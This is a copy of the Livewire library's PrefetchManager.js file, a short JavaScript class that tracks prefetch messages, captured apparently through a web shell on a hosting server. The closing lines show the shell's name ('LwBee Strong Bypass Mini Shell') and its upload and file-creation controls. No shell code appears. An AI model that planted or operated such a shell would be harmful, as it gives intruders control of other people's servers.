/home/aloic1/public_html/core/vendor/livewire/livewire/js/component/PrefetchManager.js
class PrefetchManager {
    constructor(component) {
        this.component = component
        this.prefetchMessagesByActionId = {}
    }

    addMessage(message) {
        this.prefetchMessagesByActionId[message.prefetchId] = message
    }

    actionHasPrefetch(action) {
        return Object.keys(this.prefetchMessagesByActionId).includes(
            action.toId()
        )
    }

    actionPrefetchResponseHasBeenReceived(action) {
        return !! this.getPrefetchMessageByAction(action).response
    }

    getPrefetchMessageByAction(action) {
        return this.prefetchMessagesByActionId[action.toId()]
    }

    clearPrefetches() {
        this.prefetchMessagesByActionId = {}
    }
}

export default PrefetchManager
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File